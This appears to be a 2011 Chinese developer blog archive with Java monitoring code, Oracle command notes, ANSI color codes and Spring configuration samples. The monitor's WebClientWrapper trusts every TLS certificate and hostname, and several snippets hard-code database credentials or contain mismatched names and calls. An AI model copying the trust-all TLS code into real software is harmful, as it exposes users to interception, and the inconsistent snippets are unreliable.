import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.HashMap;
import java.util.ResourceBundle;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.TimeUnit;

import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

import javazoom.jl.player.Player;

import org.apache.http.HttpHost;
import org.apache.http.HttpResponse;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.conn.ClientConnectionManager;
import org.apache.http.conn.params.ConnRoutePNames;
import org.apache.http.conn.scheme.Scheme;
import org.apache.http.conn.scheme.SchemeRegistry;
import org.apache.http.conn.ssl.SSLSocketFactory;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.params.CoreConnectionPNames;
import org.apache.http.util.EntityUtils;

public class Monitor {

  private static ResourceBundle p = ResourceBundle.getBundle("Config");

  public static void main(String[] args) {
    int interval = Integer.valueOf(p.getString("interval"));
    String do_url = p.getString("do_url");
    String pharmweb_url = p.getString("pharmweb_url");
    String do_login_url = p.getString("do_login_url");
    String pharmweb_login_url = p.getString("pharmweb_login_url");
    int timeout = Integer.valueOf(p.getString("timeout"));

    String proxyAddress = p.getString("proxy");
    int port = Integer.valueOf(p.getString("port"));

    String musicPath = p.getString("music_path");

    int sendmailCount = Integer.valueOf(p
        .getString("sendmail_interrupt_count"));
    int existCount = Integer.valueOf(p.getString("exit_interrupt_count"));

    ScheduledExecutorService service = Executors
        .newSingleThreadScheduledExecutor();
    Task task = new Task(do_url, do_login_url, pharmweb_url,
        pharmweb_login_url, timeout, proxyAddress, port, musicPath,
        sendmailCount, existCount);
    service.scheduleWithFixedDelay(task, 0, interval, TimeUnit.SECONDS);
  }
}

class Task implements Runnable {
  private static final SimpleDateFormat sf = new SimpleDateFormat(
      "dd/MM/yyyy HH:mm:ss");

  private String do_url ;
  private String pharmweb_url ;
  private String do_login_url ;
  private String pharmweb_login_url ;
  private int timeout = 30;
  private String proxyAddress = "proxy1.scig.gov.hk";
  private int port = 8080;
  private String music;
  private int sendmailCount;
  private int existCount;

  private static HashMap<String, Integer> interruptCounter = new HashMap<String, Integer>();
  private static int totalErrorConnection = 0;

  public Task(String do_url, String do_login_url, String pharmweb_url,
      String pharmweb_login_url, int timeout, String proxyAddress,
      int port, String music, int sendmailCount, int existCount) {
    this.do_url = do_url;
    this.do_login_url = do_login_url;
    this.pharmweb_url = pharmweb_url;
    this.pharmweb_login_url = pharmweb_login_url;
    this.timeout = timeout;
    this.proxyAddress = proxyAddress;
    this.port = port;
    this.music = music;
    this.sendmailCount = sendmailCount;
    this.existCount = existCount;
  }

  @Override
  public void run() {
    System.out.printf("=============== %s =====================\n", sf
        .format(new Date()));

    boolean useProxy = false;
    if (!"".equals(this.proxyAddress)) {
      useProxy = true;
    }

    System.out.printf("connect: %s\n", do_url);
    if (connectionChecking(do_url, useProxy)) {
      System.out.printf("connect: %s\n", do_login_url);
      checkDoLogin(do_login_url, useProxy);
    }

    System.out.printf("connect: %s\n", pharmweb_url);
    if (connectionChecking(pharmweb_url, false)) {
      System.out.printf("connect: %s\n", pharmweb_login_url);
      checkPharmwebLogin(pharmweb_login_url);
    }

    if (totalErrorConnection > 0) {
      System.out.printf("total error connection: [%s]\n",
          totalErrorConnection);
      if (totalErrorConnection > this.existCount) {
        System.exit(0);
      }
    }

    System.out.println("\n");
    notifyUser();
  }

  private void notifyUser() {
    for (String url : interruptCounter.keySet()) {
      int connectErrors = interruptCounter.get(url);

      if (connectErrors > this.sendmailCount) {
        System.out.println("send mail to notify users. error url: "
            + url);
        interruptCounter.put(url, 0);
      }
    }
  }

  private boolean connectionChecking(String url, boolean useProxy) {
    DefaultHttpClient client = new DefaultHttpClient();
    if (useProxy) {
      HttpHost proxy = new HttpHost(proxyAddress, port);
      client.getParams().setParameter(ConnRoutePNames.DEFAULT_PROXY,
          proxy);
    }
    client.getParams().setParameter(
        CoreConnectionPNames.CONNECTION_TIMEOUT, timeout);

    HttpGet httpget = new HttpGet(url);

    try {
      HttpResponse response = client.execute(httpget);
      System.out.println(response.getStatusLine());
      return true;
    } catch (ClientProtocolException e) {
      processException(url, e);
    } catch (IOException e) {
      processException(url, e);
    } finally {
      postProcess(client, url);
    }
    return false;
  }

  private void checkPharmwebLogin(String url) {
    final DefaultHttpClient client = new DefaultHttpClient();
    client.getParams().setParameter(
        CoreConnectionPNames.CONNECTION_TIMEOUT, timeout);

    HttpPost httpget = new HttpPost(url);

    try {
      HttpResponse response = client.execute(httpget);
      System.out.println(response.getStatusLine());
    } catch (ClientProtocolException e) {
      processException(url, e);
    } catch (IOException e) {
      processException(url, e);
    } finally {
      postProcess(client, url);
    }
  }

  private void checkDoLogin(String url, boolean useProxy) {
    HttpClient client = WebClientDevWrapper
        .wrapClient(new DefaultHttpClient());
    HttpPost httpget = new HttpPost(url);

    try {
      if (useProxy) {
        HttpHost proxy = new HttpHost(proxyAddress, port);
        client.getParams().setParameter(ConnRoutePNames.DEFAULT_PROXY,
            proxy);
      }
      client.getParams().setParameter(
          CoreConnectionPNames.CONNECTION_TIMEOUT, timeout);
      HttpResponse response = client.execute(httpget);
      System.out.println(response.getStatusLine());

      EntityUtils.consume(response.getEntity());
    } catch (ClientProtocolException e) {
      processException(url, e);
    } catch (IOException e) {
      processException(url, e);
    } finally {
      postProcess(client, url);
    }
  }

  private void processException(String url, Exception e) {
    e.printStackTrace();
    System.out.printf("connect error:[%s]\n ", url);
    try {
      InputStream in = new FileInputStream(music);
      Player player = new Player(in);
      player.play();
    } catch (Exception e1) {
      e1.printStackTrace();
    }

    int num = 1;
    if (interruptCounter.containsKey(url)) {
      num = interruptCounter.get(url);
      num++;
      interruptCounter.put(url, num);
    } else {
      interruptCounter.put(url, num);
    }
    System.out.printf("url [%s] interrupt:[%d] \n", url, num);
    totalErrorConnection++;
  }

  private void postProcess(HttpClient client, String url) {
    client.getConnectionManager().shutdown();
    /*
     * if (interruptCounter.containsKey(url)) { interruptCounter.put(url,
     * 0); }
     */
  }
}

class WebClientWrapper {
  public static HttpClient wrapClient(HttpClient base) {
    try {
      SSLContext ctx = SSLContext.getInstance("TLS");
      X509TrustManager tm = new X509TrustManager() {
        @Override
        public void checkClientTrusted(X509Certificate[] arg0,
            String arg1) throws CertificateException {
        }

        @Override
        public void checkServerTrusted(X509Certificate[] arg0,
            String arg1) throws CertificateException {
        }

        @Override
        public X509Certificate[] getAcceptedIssuers() {
          return null;
        }
      };

      ctx.init(null, new TrustManager[] { tm }, null);
      SSLSocketFactory ssf = new SSLSocketFactory(ctx,
          SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
      ClientConnectionManager ccm = base.getConnectionManager();
      SchemeRegistry sr = ccm.getSchemeRegistry();
      sr.register(new Scheme("https", 443, ssf));
      return new DefaultHttpClient(ccm, base.getParams());

    } catch (Exception e) {
      e.printStackTrace();
      return null;
    }
  }
}

参考：
http://javaskeleton.blogspot.com/2010/07/avoiding-peer-not-authenticated-with.html
http://javasight.net/2011/06/avoid-javax-net-ssl-sslpeerunverifiedexception/

2011-12-13

2011-12-13

apache中文翻译

http://lamp.linux.gov.cn/jinbuguo_florilegium.html

2011-12-12

2011-12-12

linux echo颜色控制

echo要变换颜色的时候，要使用参数-e

格式: echo -e “\033[字背景颜色;字体颜色m字符串\033[0m”

例如:
echo -e “\033[41;36m something here \033[0m”

其中41的位置代表底色, 36的位置是代表字的颜色

那些ascii code 是对颜色调用的始末.

\033[ ; m …… \033[0m

让字体变为红色并且不停的闪烁

#echo -e “\033[31m \33[05m 请确认是否要停止当前的squid进程,输入 [Y/N] \033[0m”

或者

#echo -e “\033[31m \033[05m 请确认是否要停止当前的squid进程,输入 [Y/N] \033[0m”

字背景颜色范围:40—-49

40:黑 

41:深红 

42:绿 

43:黄色 

44:蓝色 

45:紫色 

46:深绿 

47:白色

字颜色:30———–39

30:黑 

31:红 

32:绿 

33:黄 

34:蓝色 

35:紫色 

36:深绿 

37:白色

ANSI控制码的说明

\33[0m 关闭所有属性 

\33[1m 设置高亮度 

\33[4m 下划线 

\33[5m 闪烁 

\33[7m 反显 

\33[8m 消隐 

\33[30m -- \33[37m 设置前景色 

\33[40m -- \33[47m 设置背景色 

\33[nA 光标上移n行 

\33[nB 光标下移n行 

\33[nC 光标右移n行 

\33[nD 光标左移n行 

\33[y;xH设置光标位置 

\33[2J 清屏 

\33[K 清除从光标到行尾的内容 

\33[s 保存光标位置 

\33[u 恢复光标位置 

\33[?25l 隐藏光标 

\33[?25h 显示光标

2011-12-09

2011-12-09

aix url

http://www.ibm.com/developerworks/cn/aix/library/1111_liuge_getstartaix/?cmp=dwskl&cpb=dw&ct=dwcon&cr=cn_CSDN&ccy=cn
http://darkmasky.iteye.com/blog/224936
http://space.itpub.net/9390331/viewspace-688116
http://www.softpanorama.org/Commercial_unixes/AIX/aix_networking.shtml
http://study.chyangwa.com/IT/AIX/aixcmds1/mastertoc.htm

2011-12-02

2011-12-02

sqlplus connect oracle

find status and sid:

lsnrctl status
lsnrctl service

connect db

1	sqlplus apps/apps@"(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.100.5)(PORT=1521))(CONNECT_DATA=(SID=OAPROD)))"

运行本地命令

SQL> host dir

export prd

exp user/password tables=task, payment file=payment_task.dmp INDEXES=N CONSTRAINTS=N GRANTS=N ROWS=Y

bakcup uat

exp user/password tables=lic_app, company_cop , company , task, payment file=cop.dmp INDEXES=N CONSTRAINTS=N GRANTS=N ROWS=Y

import uat

imp user/password tables=case_legal_advice file=case_legal_advice.dmp IGNORE=Y
`imp user/ password full=y file=payment_task.dmp IGNORE=Y
``

# background job
`nohup java MyProg > /dev/null 2>&1 &`

2011-11-29

2011-11-29

linux下启动oracle

http://blog.sina.com.cn/s/blog_56d8ea900100noxa.html
http://apps.hi.baidu.com/share/detail/47434067

2011-11-21

2011-11-21

Spring-test + JSF 1.2 + Portlet

jsf Bean

@Controller
@Scope("request")
public class FooBean extends AbstractRequestBean {
  private static final Logger log = Logger
      .getLogger(FooBean.class);

  @Autowired
  private FooService service;

  private String user;

  public void setFooService(FooService service){
    this.service = service;
  }

  public String hi(){
    String str = getLoginUser() + " say hi to " + getUser();
    getPortletRequest().setAttribute("message", str);
    return "bar";
  }

  public void setUser(String user){
    this.user = user;
  }

  public String getUser(){
    return user;
  }
}

AbstractRequestBean

import javax.faces.context.FacesContext;
import javax.portlet.PortletRequest;
import javax.servlet.http.HttpServletRequest;

public abstract class AbstractRequestBean {
  private String loginUser;
  private PortletRequest portletRequest;
  private HttpServletRequest servletRequest;

  public String getLoginUser() {
    if (loginUser == null)
      return User.getCurrentUser(getPortletRequest()).getUsername();

    return loginUser;
  }

  public void setLoginUser(String loginUser) {
    this.loginUser = loginUser;
  }

  public PortletRequest getPortletRequest() {
    if (portletRequest == null)
      return (PortletRequest) FacesContext.getCurrentInstance()
          .getExternalContext().getRequest();

    return portletRequest;
  }

  // for jsp/servlet call directly, not jsf bean
  public HttpServletRequest getServletRequest() {
    if (servletRequest == null)
      return (HttpServletRequest) FacesContext.getCurrentInstance()
          .getExternalContext().getRequest();

    return servletRequest;
  }

  public void setServletRequest(HttpServletRequest servletRequest) {
    this.servletRequest = servletRequest;
  }

  public void setPortletRequest(PortletRequest portletRequest) {
    this.portletRequest = portletRequest;
  }

}

FooTest

@ContextConfiguration(locations = "/applicationContext.xml")
public class FooTest extends AbstractJUnit38SpringContextTests {

  @Autowired
  private FooService service;;

  public void testHi(){
    FooBean bean = new FooBean();
    MockPortletRequest request = new MockPortletRequest();
    MockPortletSession session = new MockPortletSession();
    session.setAttribute(FooBean.class.getName()
        + "/programme", "06721", PortletSession.APPLICATION_SCOPE);
    request.setSession(session);
    bean.setPortletRequest(request);
    bean.setLoginUser("Jay");

    bean.setService(service);
    bean.hi("Forest");
  }
}

2011-09-28

2011-09-28

Apache CXF + Spring

比较了Spring WS和Apache CXF，觉得Spring WS属于contract-first类型的WebService，自己不熟悉xsd，
所以使用Apache CXF这个组件，而且它的功能更为强大并且可以与Spring整合。
部署在tomcat上，然后访问 http://127.0.0.1:8080/foo/HelloWorld?wsdl

applicationContext.xml

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xmlns:aop="http://www.springframework.org/schema/aop"
	xmlns:context="http://www.springframework.org/schema/context"
	xmlns:tx="http://www.springframework.org/schema/tx"
	xmlns:jee="http://www.springframework.org/schema/jee"
	xmlns:jaxws="http://cxf.apache.org/jaxws"
	xsi:schemaLocation="
    http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd
    http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.5.xsd
    http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-2.5.xsd
    http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.5.xsd
    http://www.springframework.org/schema/jee http://www.springframework.org/schema/jee/spring-jee-2.5.xsd
	http://cxf.apache.org/jaxws http://cxf.apache.org/schemas/jaxws.xsd">

	<context:component-scan base-package="xx" />
	<context:annotation-config />

	<bean id="entityManagerFactory"
		class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
		<property name="persistenceXmlLocation"
			value="classpath:META-INF/persistence.xml" />
		<property name="persistenceUnitName" value="someDB" />
	</bean>


	<bean id="transactionManager"
		class="org.springframework.orm.jpa.JpaTransactionManager">
		<property name="entityManagerFactory"
			ref="entityManagerFactory" />
	</bean>

	<tx:annotation-driven transaction-manager="transactionManager" />

	<tx:advice id="syncAdvice"
		transaction-manager="transactionManager">
		<tx:attributes>
			<tx:method name="get*" read-only="true" />
			<tx:method name="*" read-only="false" />
		</tx:attributes>
	</tx:advice>

	<aop:config>
		<aop:pointcut id="syncOperation"
			expression="execution(public * xx..*Service.*(..))" />
		<aop:advisor advice-ref="syncAdvice"
			pointcut-ref="syncOperation" />
	</aop:config>

	<import resource="classpath:META-INF/cxf/cxf.xml" />
	<import resource="classpath:META-INF/cxf/cxf-extension-soap.xml" />
	<import resource="classpath:META-INF/cxf/cxf-servlet.xml" />

	<jaxws:endpoint id="helloWorld" implementor="#helloWorldService"
		address="/HelloWorld" />

	<jaxws:client id="helloWorldClient"
		serviceClass="xx.HelloWorld"
		address="http://localhost:8080/shape/shape2sp" />

</beans>

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4">
	<listener>
		<listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
	</listener>
	<servlet>
		<servlet-name>CXFServlet</servlet-name>
		<display-name>CXF Servlet</display-name>
		<servlet-class>
			org.apache.cxf.transport.servlet.CXFServlet
		</servlet-class>
		<load-on-startup>1</load-on-startup>
	</servlet>

	<servlet-mapping>
		<servlet-name>CXFServlet</servlet-name>
		<url-pattern>/*</url-pattern>
	</servlet-mapping>
</web-app>

HelloWorld.java

package xx;

@WebService
public interface HelloWorld {
  void sayHi(String user);
}

HelloWorldService.java

package xx;

@Service
@WebService(endpointInterface = "xx.HelloWorld", serviceName = "HelloWorld")
public class HelloWorldService implements HelloWorld{
  public void sayHi(String user){
    System.out.println("hello: " + user);
  }
}

2011-09-15

2011-09-15

我的chrome extension

Bubble Translate
IE Tab
Smooth Gestures
google directory
cookie.txt export
colorPicker
Awesome Screenshot: Capture & Annotate

2011-09-14

2011-09-14

hg config

hg --config=http_proxy.host=proxyhost:8080 clone https://xx@code.google.com/p/projectname/

hgrc

[paths]
default = https://xx@code.google.com/p/projectname/
[ui]
username = xx

[extensions]
extdiff =
[extdiff]
cmd.bc = C:/Program Files (x86)/Beyond Compare 3/BComp.exe
opts.bc = /ro

[http_proxy]
host = proxyserver:8080
user =
passwd =

2011-09-06

2011-09-06

Websphere下的Scheduler

项目需要些一个在Websphere下写一个Scheduler，很自然想到使用Quartz，可是总出现unmanaged thead的问题，
折腾多时最后放弃使用org.springframework.transaction.jta.WebSphereUowTransactionManager，改用
com.atomikos.icatch.jta.UserTransactionManager，问题就解决了

applicationContext.xml

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xmlns:aop="http://www.springframework.org/schema/aop"
	xmlns:context="http://www.springframework.org/schema/context"
	xmlns:tx="http://www.springframework.org/schema/tx"
	xmlns:jee="http://www.springframework.org/schema/jee"
	xsi:schemaLocation="
    http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd
    http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.5.xsd
    http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-2.5.xsd
    http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.5.xsd
    http://www.springframework.org/schema/jee http://www.springframework.org/schema/jee/spring-jee-2.5.xsd">

	<context:component-scan base-package="xx.yy" />
	<context:annotation-config />

	<jee:jndi-lookup id="spds" jndi-name="jdbc/X1"
		cache="true" expected-type="javax.sql.DataSource"
		lookup-on-startup="true" />

	<jee:jndi-lookup id="srsds" jndi-name="jdbc/X2"
		cache="true" expected-type="javax.sql.DataSource"
		lookup-on-startup="true" />

	<jee:jndi-lookup id="casds" jndi-name="jdbc/X3"
		cache="true" expected-type="javax.sql.DataSource"
		lookup-on-startup="true" />

	<bean id="entityManagerFactory"
		class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
		<property name="persistenceXmlLocation"
			value="classpath:META-INF/persistence.xml" />
		<property name="persistenceUnitName" value="sp" />
		<property name="dataSource" ref="spds" />
	</bean>

	<bean id="srsEntityManagerFactory"
		class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
		<property name="persistenceXmlLocation"
			value="classpath:META-INF/persistence.xml" />
		<property name="persistenceUnitName" value="srs" />
		<property name="dataSource" ref="srsds" />
	</bean>

	<bean id="casEntityManagerFactory"
		class="org.springframework.orm.jpa.LocalContainerEntityManagerFactoryBean">
		<property name="persistenceXmlLocation"
			value="classpath:META-INF/persistence.xml" />
		<property name="persistenceUnitName" value="cas" />
		<property name="dataSource" ref="casds" />
	</bean>

	<bean id="AtomikosTransactionManager"
		class="com.atomikos.icatch.jta.UserTransactionManager"
		init-method="init" destroy-method="close">

		<property name="forceShutdown" value="false" />
	</bean>

	<bean id="AtomikosUserTransaction"
		class="com.atomikos.icatch.jta.UserTransactionImp">
		<property name="transactionTimeout" value="300" />
	</bean>

	<bean id="transactionManager"
		class="org.springframework.transaction.jta.JtaTransactionManager">
		<property name="transactionManager"
			ref="AtomikosTransactionManager" />
		<property name="userTransaction" ref="AtomikosUserTransaction" />
	</bean>

	<tx:annotation-driven transaction-manager="transactionManager" />

	<tx:advice id="cronAdvice"
		transaction-manager="transactionManager">
		<tx:attributes>
			<tx:method name="get*" read-only="true" />
			<tx:method name="*" read-only="false" />
		</tx:attributes>
	</tx:advice>

	<aop:config>
		<aop:pointcut id="cronOperation"
			expression="execution(public * xx.yy..*Service(..))" />
		<aop:advisor advice-ref="cronAdvice"
			pointcut-ref="cronOperation" />
	</aop:config>

	<!-- mail -->
	<context:property-placeholder location="WEB-INF/mail.properties" />
	<bean id="mailSender"
		class="org.springframework.mail.javamail.JavaMailSenderImpl">
		<property name="host" value="${mail.host}" />
		<property name="username" value="${mail.username}" />
		<property name="password" value="${mail.password}" />
		<property name="port" value="${mail.port}" />
		<property name="javaMailProperties">
			<props>
				<prop key="mail.debug">false</prop>
				<prop key="mail.smtp.auth">true</prop>
			</props>
		</property>
	</bean>
	<bean id="templateMessage"
		class="org.springframework.mail.SimpleMailMessage">
		<property name="from" value="${mail.from}" />
	</bean>

</beans>

applicationContext-Quartz.xml

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:aop="http://www.springframework.org/schema/aop"
  xmlns:context="http://www.springframework.org/schema/context"
  xmlns:tx="http://www.springframework.org/schema/tx"
  xmlns:jee="http://www.springframework.org/schema/jee"
  xsi:schemaLocation="
    http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd
    http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.5.xsd
    http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-2.5.xsd
    http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.5.xsd
    http://www.springframework.org/schema/jee http://www.springframework.org/schema/jee/spring-jee-2.5.xsd">


  <bean id="ttl006Timer"
    class="org.springframework.scheduling.quartz.MethodInvokingJobDetailFactoryBean">
    <property name="targetObject" ref="txnSyncJob" />
    <property name="targetMethod" value="run" />
    <property name="concurrent" value="false" />
  </bean>

  <bean id="ttl06cronTrigger"
    class="org.springframework.scheduling.quartz.CronTriggerBean">
    <property name="jobDetail" ref="ttl006Timer" />
    <property name="cronExpression" value="0/30 * * * * ?" />
  </bean>


  <bean id="act016Timer"
    class="org.springframework.scheduling.quartz.MethodInvokingJobDetailFactoryBean">
    <property name="targetObject" ref="activityJob" />
    <property name="targetMethod" value="run" />
    <property name="concurrent" value="false" />
  </bean>

  <bean id="act016cronTrigger"
    class="org.springframework.scheduling.quartz.CronTriggerBean">
    <property name="jobDetail" ref="act016Timer" />
    <property name="cronExpression" value="0/50 * * * * ?" />
  </bean>


  <bean
    class="org.springframework.scheduling.quartz.SchedulerFactoryBean" destroy-method="destroy">
    <property name="waitForJobsToCompleteOnShutdown" value="false"/>
    <property name="triggers">
      <list>
        <ref bean="ttl06cronTrigger" />
        <ref bean="act016cronTrigger" />
      </list>
    </property>
  </bean>

</beans>

web.xml

  <?xml version="1.0" encoding="UTF-8"?>
  <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4">
    <context-param>
      <param-name>contextConfigLocation</param-name>
      <param-value>/WEB-INF/applicationContext.xml, /WEB-INF/applicationContext-Quartz.xml</param-value>
    </context-param>

    <context-param>
      <param-name>log4jConfigLocation</param-name>
      <param-value>/WEB-INF/classes/log4j.xml</param-value>
    </context-param>
    <listener>
      <listener-class>org.springframework.web.util.Log4jConfigListener</listener-class>
    </listener>
    <listener>
      <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
    </listener>
  </web-app>

参考
http://www.ibm.com/developerworks/websphere/techjournal/0609_alcott/0609_alcott.html

2011-08-30

2011-08-30

Spring事务的一些应用

TransactionManager通过TransactionSynchronizationManager进行事务控制，TransactionTemplate就使用transactionManager运行sql。

TransactionTemplate -> PlatformTransactionManager -> TransactionSynchronizationManager

TransactionTemplate transactionTemplate = new TransactionTemplate(transactionManager);
transactionTemplate.execute(new TransactionCallbackWithoutResult() {
  @Override
  protected void doInTransactionWithoutResult(TransactionStatus arg0) {
    int count = em.createNativeQuery("delete XX").executeUpdate();
  }
});

可以利用TransactionAspectSupport.currentTransactionStatus()控制事务状态，利用setRollbackOnly
要知道是否一个活动事务可以用TransactionSynchronizationManager.isActualTransactionActive()

写了一个Audit，目的在事务结束前调用一个oracle的package，记录所有变化的数据。

import java.lang.reflect.Field;
import java.sql.CallableStatement;
import java.sql.Connection;
import java.sql.SQLException;
import java.util.Map;

import javax.persistence.EntityManager;

import oracle.jdbc.driver.OracleTypes;

import org.apache.log4j.Logger;
import org.aspectj.lang.JoinPoint;
import org.aspectj.lang.annotation.After;
import org.aspectj.lang.annotation.Aspect;
import org.aspectj.lang.annotation.Before;
import org.aspectj.lang.annotation.Pointcut;
import org.hibernate.Session;
import org.hibernate.jdbc.Work;
import org.springframework.orm.jpa.EntityManagerFactoryInfo;
import org.springframework.orm.jpa.EntityManagerHolder;
import org.springframework.orm.jpa.LocalEntityManagerFactoryBean;
import org.springframework.stereotype.Component;
import org.springframework.transaction.interceptor.TransactionAspectSupport;
import org.springframework.transaction.support.TransactionSynchronizationManager;

@Component
@Aspect
public class AuditRecorder {
  private static final Logger log = Logger.getLogger(AuditRecorder.class);

  @After("execution(public * xx.yy..*Service.*(..)) && @annotation(auditable)")
  public void recordUsage(JoinPoint jp) {
    audit();
  }

  private void audit() {
    if (TransactionSynchronizationManager.isActualTransactionActive()) {
      Map map = TransactionSynchronizationManager.getResourceMap();
      log.info("mapsize " + map.size());
      for (Object key : map.keySet()) {
        log.debug("key  " + key + " , " + map.get(key));

        if (key instanceof EntityManagerFactoryInfo) {
          EntityManagerFactoryInfo info = (EntityManagerFactoryInfo) key;

          String unitName = info.getPersistenceUnitName();
          if (!unitName.contains("srs") && !unitName.contains("cas")) {
            log.debug("call audit procedure.");
            if (map.get(key) instanceof EntityManagerHolder) {
              EntityManagerHolder emHolder = (EntityManagerHolder) map
                  .get(key);
              EntityManager em = emHolder.getEntityManager();
              Session s = (Session) em.getDelegate();
              s.doWork(new Work() {
                public void execute(Connection conn)
                    throws SQLException {
                  String sql = "{call SP_COMMON.setloginuser(?)}";
                  CallableStatement call = conn
                      .prepareCall(sql);
                  call.setString(1, "test");
                  call.executeUpdate();

                  CallableStatement call2 = conn
                      .prepareCall("{? = call SP_COMMON.getloginuser}");
                  call2.registerOutParameter(1,
                      OracleTypes.VARCHAR);
                  call2.executeQuery();

                  System.out.println("<< "
                      + call2.getString(1));
                }
              });
            }
          }
        }
      }
    }
  }
}

2011-08-11

2011-08-11

(转)Oracle中dual表的用途

http://blog.csdn.net/dxz_1983/article/details/2632564

2011-08-02

2011-08-02

EditPlus + JavaFx 编写SQL简易查询器

用过DbVisualizer和Oracle SQL Developer，感觉有不足之处，遂期望在EditPlus上打造一个简易的SQL查询器。

Query.java, 用于在EditPlus上显示结果

package forest;

import static java.lang.System.out;

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.ResultSetMetaData;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

import org.apache.commons.beanutils.BasicDynaClass;
import org.apache.commons.beanutils.DynaBean;
import org.apache.commons.beanutils.DynaProperty;

public class Query {
  static Connection conn;
  static String xxUrl = "jdbc:oracle:thin:@192.168.0.1:1521:SP";
  static String yyUrl = "jdbc:oracle:thin:@192.168.0.2:1521:XE";
  static String zzUrl = "jdbc:sqlserver://192.168.0.3:1433;DatabaseName=northwind";
  static List<DynaBean> beans = new ArrayList<DynaBean>();
  static List<String> columnNames = new ArrayList<String>();
  static {
    try {
      Class.forName("oracle.jdbc.driver.OracleDriver");
      Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver");
    } catch (Exception e) {
      e.printStackTrace();
    }
  }

  public static List<DynaBean> getBeans() {
    return beans;
  }

  public static List<String> getColumnNames() {
    return columnNames;
  }

  private static void consoleRunSQL(String sql) throws Exception {
    runSQL(sql);
    StringBuilder sb = new StringBuilder();
    for (DynaBean bean : beans) {
      for (int i = 1; i <= columnNames.size(); i++) {
        String col = columnNames.get(i - 1);
        String row = String.format("%-18s = %s\n", col, bean.get(col));
        sb.append(row);
      }
      sb.append("-------------------------\n\n");
      sb.append("total: " + beans.size() + " records.");
      out.println(sb.toString());
    }

  }

  private static void runSQL(String sql) throws Exception {
    if (sql.trim().length() == 0) {
      out.println("sql is empty.");
      return;
    }
    // out.println("run " + sql);
    ResultSet rs = null;
    Statement stmt = null;

    out.println("");
    if (!sql.startsWith("select")) {
      stmt = conn.createStatement();
      int rows = stmt.executeUpdate(sql);
      out.println(rows + " reords has been process.");
      return;
    }

    try {
      stmt = conn.createStatement(ResultSet.TYPE_FORWARD_ONLY,
          ResultSet.CONCUR_READ_ONLY);
      rs = stmt.executeQuery(sql);
      ResultSetMetaData metaRs = rs.getMetaData();

      int columns = metaRs.getColumnCount();

      List<DynaProperty> props = new ArrayList<DynaProperty>();
      for (int i = 1; i <= columns; i++) {
        String colName = metaRs.getColumnName(i).toLowerCase();
        props.add(new DynaProperty(colName, String.class));

        columnNames.add(colName);
      }

      BasicDynaClass dynaClass = new BasicDynaClass("JDBCResult", null,
          props.toArray(new DynaProperty[0]));

      while (rs.next()) {
        DynaBean bean = dynaClass.newInstance();
        for (int i = 1; i <= columns; i++) {
          bean.set(columnNames.get(i - 1).toLowerCase(), rs
              .getString(i));
        }
        beans.add(bean);
      }

    } finally {
      if (rs != null) {
        rs.close();
        stmt.close();
      }
    }
  }

  public static void launch(String[] args) throws Exception {
    if (args.length < 2) {
      out.println("enter arguments.");
      return;
    }
    if (args[0].equals("xx")) {
      initSP();
    } else if (args[0].equals("yy")) {
      initSRS();
    } else if (args[0].equals("zz")) {
      initCAS();
    } else {
      out.println("type is wrong, it should be xx / yy / zz.");
      return;
    }
    try {
      if (args.length == 2)
        consoleRunSQL(args[1]);
      else
        runSQL(args[2]);
    } finally {
      conn.close();
    }
  }

  private static void initSP() throws SQLException {
    conn = DriverManager.getConnection(xxUrl, "xx", "xx");
  }

  private static void initSRS() throws SQLException {
    conn = DriverManager.getConnection(yyUrl, "yy", "yy");
  }

  private static void initCAS() throws SQLException {
    conn = DriverManager.getConnection(zzUrl, "zz", "zz");
  }

  public static void test() throws Exception {
    String[] args = new String[] { "xx",
        "select * from xxTable" };
